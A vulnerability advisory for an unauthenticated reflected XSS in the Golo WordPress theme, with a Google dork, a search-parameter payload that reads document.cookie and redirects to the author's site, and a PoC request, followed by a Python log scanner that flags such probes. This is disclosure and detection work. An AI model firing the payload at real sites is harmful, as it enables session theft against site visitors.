[+] Exploit Title: Golo - City Travel Guide WordPress Theme v1.3.2 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/golo/
[+] Date: 2020-07-01
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Uxper [ http://uxper.co ]
[+] Software Version: 1.3.2
[+] Software Link: https://themeforest.net/item/golo-city-guide-wordpress-theme/25397810
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Golo theme v1.3.2 for WordPress.



### [ Payload: ]

[$] "><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">



### [ PoC: ]

[!] https://wp.getgolo.com/?s=%22%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E&post_type=place

[!] GET /?s=%22%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E&post_type=place HTTP/1.1
Host: wp.getgolo.com
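As an added example that is not part of this advisory: a site operator who cannot replace the theme yet can at least spot exploitation attempts in the web server access log by decoding the `s` search parameter and checking it for markup. The log lines below are constructed (Combined Log Format, documentation-range IPs); the first request is this advisory's PoC URL, the others are benign searches.

```python
"""Flag WordPress search requests (?s=...) whose decoded term carries HTML/JS."""
import re
from urllib.parse import parse_qs, urlsplit

# Heuristic: a tag opener, an inline event handler (onerror=, onload=, ...)
# or a javascript: URL inside the search term. A plain word such as
# "online=" would also trip the second alternative; tune for your traffic.
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)

# Combined Log Format prefix up to the request target; the rest of the line is ignored.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Constructed sample log. Line 1 is the PoC request from this advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jul/2020:10:00:01 +0000] "GET /?s=%22%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E&post_type=place HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.8 - - [01/Jul/2020:10:00:02 +0000] "GET /?s=coffee+shop&post_type=place HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jul/2020:10:00:03 +0000] "GET /?s=%22best+pizza%22&post_type=place HTTP/1.1" 200 4096 "-" "curl/7.64.0"
"""


def search_terms(target):
    """Return the decoded `s` values of a request target (empty list if absent).

    parse_qs percent-decodes and maps '+' to a space, which mirrors how PHP
    fills $_GET for a WordPress search form, so we match on what the theme
    actually echoed rather than on the raw encoded string.
    """
    return parse_qs(urlsplit(target).query).get("s", [])


def find_xss_probes(log_text):
    """Return (client_ip, decoded_search_term, post_type) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # malformed or non-request line
        params = parse_qs(urlsplit(m["target"]).query)
        for term in params.get("s", []):
            if SUSPICIOUS.search(term):
                hits.append((m["ip"], term, params.get("post_type", [""])[0]))
    return hits


if __name__ == "__main__":
    for ip, term, post_type in find_xss_probes(SAMPLE_LOG):
        print(f"{ip} post_type={post_type!r} s={term!r}")
```

The decoded term is what gets reflected into the page, so alerting on it (rather than on the raw URL) also catches variants that only differ in encoding.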



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector